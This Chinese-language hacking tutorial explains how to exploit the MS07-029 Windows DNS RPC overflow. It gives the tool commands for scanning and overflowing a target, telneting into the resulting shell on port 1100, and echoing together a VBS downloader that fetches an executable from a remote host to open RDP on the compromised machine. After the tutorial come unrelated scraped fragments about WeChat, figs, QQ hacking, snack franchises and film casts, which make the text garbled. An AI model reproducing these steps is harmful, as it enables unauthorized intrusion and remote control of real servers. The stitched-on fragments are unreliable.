前言:
MS07-029,Windows 域名系统 (DNS) 服务器服务的远程过程调用 (RPC) 管理接口中存在基于堆栈的缓冲区溢出。漏洞的前提是没打补丁,开启DNS服务的所有版本WINDOWS 2000 Server和WINDOWS 2003 Server。
今天,就让我带领各路英豪,踏上DNS EXP之路。
我们先来看看所用工具的界面:
这就是传说中的利用工具,可以通杀2000SEVER,2003SEVER系统,另外还具备了扫描功能!
先用它来对主机进行扫描:
在我们的命令行下输入:“dns –s 目标IP地址”
稍等片刻,开放的端口以及操作系统以出现在我们面前,如果出现了如上图所显示的“1029:Vulnerability”那么恭喜你,你马上就会成功得到这台主机的权限了
上图意思就是1029端口存在漏洞。
现在我们来最关键的步骤――溢出:
在命令行内输入
dns -2003chs *.*.93.189 1029
其中-2003ch的意思是操作系统的型号,-2003chs即简体中文版的2003系统,
如果是2000的系统就使用“-2000all”参数,*.*.93.189就是我们的目标IP地址,1029就是刚才扫描出存在漏洞的端口”。
出现“Attack sent ,check port 1100”字样,说明已经打开了目标地址的1100端口,我们TELNET上去:TELNET *.*.93.189 1100
我们现在已经成功的入侵了对方的电脑,并且得到了管理员的权限。
下面我给大家介绍一下如何在肉鸡上面开3389,
在命令行里输入
@echo with wscript:if .arguments.count^ tony.vbs
@echo set aso=.createobject("adodb.stream"):set web=createobject("microsoft.xmlhttp") >>tony.vbs
@echo web.open "get",.arguments(0),0:web.send:if web.status^>200 then .echo "Error:" web.status:.quit >>tony.vbs
@echo aso.type=1:aso.open:aso.write web.responsebody:aso.savetofile .arguments(1),2:end with >>tony.vbs
大概的意思就是在命令行创立一个用来下载的VBS脚本tony.vbs
然后把开3389的工具上传到你的个人空间,
我这里用的是火狐开3389的工具,在命令行里输入 cscript tony.vbs http://你空间地址/wrsky.exe c:\wrsky.exe
微信建微信群?手机微信现在是当下最普及化的手机上社交软件了,新奇的游戏玩法和极高的人气值促使大家日常生活没法摆脱它的小魔抓咯,那麼怎样用它创建群和好多个朋友另外闲聊呢? 一起来瞧瞧吧!...
它的营养十分的丰富,含有碳水化合物、蛋白质、膳食纤维、果胶、多糖、维生素A、维生素C、维生素E、钙、镁、钾、磷等多种对人体有益的营养物质,而且它的作用也有很多。 无花果食疗作用一:保护视力,提高...
一般来说,主要有这些方法,首先,最简2单的就是申诉,加了对方好友很久,而且经常联系,而且你自5己进行了实名认证,反正就是,你自己资料越详3细越好。 网友都在找:网上QQ找回黑客盗取qq密码怎么黑QQ密...
在2019年,npm 的缝隙数量添加了 47%网络勒索的表现方法,根本不外乎以下五种:跟着使用程序安全性的不断老练,寻觅真实的新技能变得越来越难,所以在不断的演化过程中,能看到这种可证实的安全危险,十...
如今零食行业的成长长短常不错的,许多加盟商也都看中了这一市场行情,纷纷想要加盟到个中来,可是呢,各人在面临浩瀚加盟项目标时候,一时间都慌了神,不知道该如何举办选择,那么胖妞食品加盟项目怎么样呢?选择加...
本文目录一览: 1、黑客帝国的主演是谁? 2、黑客帝国 演员表 3、黑客帝国的演员表 4、黑客帝国一共几部,每部的名字叫什么,中文和英文的都要,还要主要演员的名字? 5、求黑客帝国演员...